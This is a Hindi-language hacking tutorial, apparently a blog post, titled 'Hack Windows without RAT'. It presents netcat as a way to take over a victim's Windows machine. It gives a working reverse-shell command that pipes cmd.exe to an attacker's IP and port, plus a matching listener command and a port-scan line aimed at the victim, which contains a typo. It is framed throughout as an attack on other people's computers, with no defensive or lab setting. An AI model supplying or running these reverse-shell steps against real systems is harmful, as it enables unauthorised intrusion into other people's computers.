HACK WINDOWS WITHOUT RAT
नमस्कार दोस्तों,
जब आप इन चीजों को समझना शुरू करेगे तभी आपको ये आसान लेगी। जब तक आप किसी चीज को समझेगें नहीं तब तक वह आसन नहीं होगी। अगर हैकर्स ने ठान लिया की उसे अपने विक्टिम को हैक करना है तो वह कर ही लेता है, हो सकता इसमें समय लग जाये।
अगर आप यह सोचते है कि किसी को भी 1 या दो मिनट में हैक किया जा सकता है तो आप गलत है। हैकिंग इतनी भी आसान नहीं है।
हैकर्स को किसी भी RAT की जरूरत नहीं होती है। वह विण्डोज में मौजूद टूल का उपयोग करके ही हैक कर लेते है।
A Network Scanner Utility
विण्डोज में एक प्री-इंस्टाल टूल होता है – Ping
जिसका उपयोग नेटवर्किंग में किया जाता है। कोई सिस्टम इन्टरनेट तक अपनी पहुंच बना पा रहा है या नहीं, इस टूल की मदद से पता लगाया जा सकता है। यह टूल होस्ट को पैकेज भेजता है अगर पैकेज वापस आते है तो वह होस्ट लाईव है। पिंग टूल लिनक्स में भी प्री-इंस्टाल आता है।
उदाहरण के तौर पर आपके मित्र के सिस्टम की आईपी है – 127.0.0.1
जब आप ping कमाण्ड का उपयोग कर रिक्वेट भेजे अगर Reply आता है तो सिस्टम ओन है नहीं तो ओफ है।
ping 127.0.0.1

पिंग कमाण्ड से वह सिस्टम लाईव है या ओफ यह पता तो किया जा सकता है। लेकिन उस सिस्टम को कौनसी पोर्ट ओपन है यह पता नहीं किया जा सकता है। सिस्टम कौन-कौन सी पोर्ट ओपन है, यह देखने के लिए ज्यादातर लोग Nmap टूल का इस्तेमाल करते है।
मैं आपको विण्डोज के एक ऐसे टूल के बारे में बताऊगां जिसकी मदद से पोर्ट को ओपन भी किया जाता सकता है और ओपन पोर्ट का उपयोग भी किया जा सकता है। इस टूल की मदद से CMD और Terminal को कहीं भी एक्सेस कर सकते है।
इस टूल का नाम है – Netcat
यह भी एक नेटर्किंग टूल है। यह विण्डोज में प्री-इंस्टाल नहीं आता है। काली लिनक्स में यह प्री-इंस्टाल आता है। विण्डोज में उपयोग करने के लिए आपको इसे डाउनलोड करन पड़ेगा। इस इंस्टाल करने की जरूरत नही है। यह एक पोर्टेबल टूल है। यह एक कमाण्ड लाईन बेस्ड टूल है जो CMD या Teminal में रन करता है।
नेटकट को 1995 में ओफिशियल रिलीज किया गया था। यह एक ओपन सोर्स यूटिलीटी है। NMap के साथ यह टूल इनबिल्ड होता है। NMap के फोल्डर में यह आपको मिल जायेगा। आप इसे NMap की ओफिशिय साईट से भी डाउनलोड कर सकते है।
इस टूल को डाउनलोड करके, जिप फोल्डर को Extract करे। फिर फोल्डर में जाकर उसी फोल्डर में CMD को ओपन करें। CMD को ओपन करने के लिए आप एड्रेस बार में CMD टाईप कर एन्टर करेगे तो CMD ओपन हो जायेगा।
ncat -h टाईप करके, इसके सारे कमाण्ड देख सकते है।
रिवर्स शैल क्या है?
सिस्टम में किसी भी कार्य को करने के लिए हम किसी कमाण्ड लाईन या ग्राफिक यूजर इंटरफेस का उपयोग करते है। उसे शैल कहते है। टर्मिनल व CMD भी एक प्रकार से शैल के ही भाग है।
टारगेट का सिस्टम हमलावर के सिस्टम पर वापस सम्पर्क करता है, हमलावर के सिस्टम पर पोर्ट लिस्नर पर लगी होती है। जिससे कनेक्शन स्थिपित हो जाता है। यह प्रक्रिया रिवर्स शैल कहलाती है।
इसका सीधा उदहारण RAT है। RAT भी इसी तरह कार्य करता है।
लिनक्स में रन करने के लिए टर्मिनल में nc टाईप करें, नेटकट रन हो जायेगा। विण्डोज में CMD ओपन करे, और ncat को टाइप करें।
रिवर्स शैल कैसे ओपन करें?
Netcat का रिवर्स शैल में उपयोग करने के लिए Cmd को ओपन करें और नीचे दिये गये कमाण्ड का उपयोग करें
For Shell
ncat attaker Ip + Port -e cmd.exe
ncat 192.168.43.64 4444 -e cmd.exe

For Listerine
ncat -lp 4444


कुछ और कमाण्ड जिनका उपयोग किया जा सकता है।
विक्टिम के सिस्टम में कौन-कौनसी पोर्ट ओपन है यह भी स्केन कर सकते है।
Scan Port
nv -v -n -z -w1 (Target ip address) (start port – end port)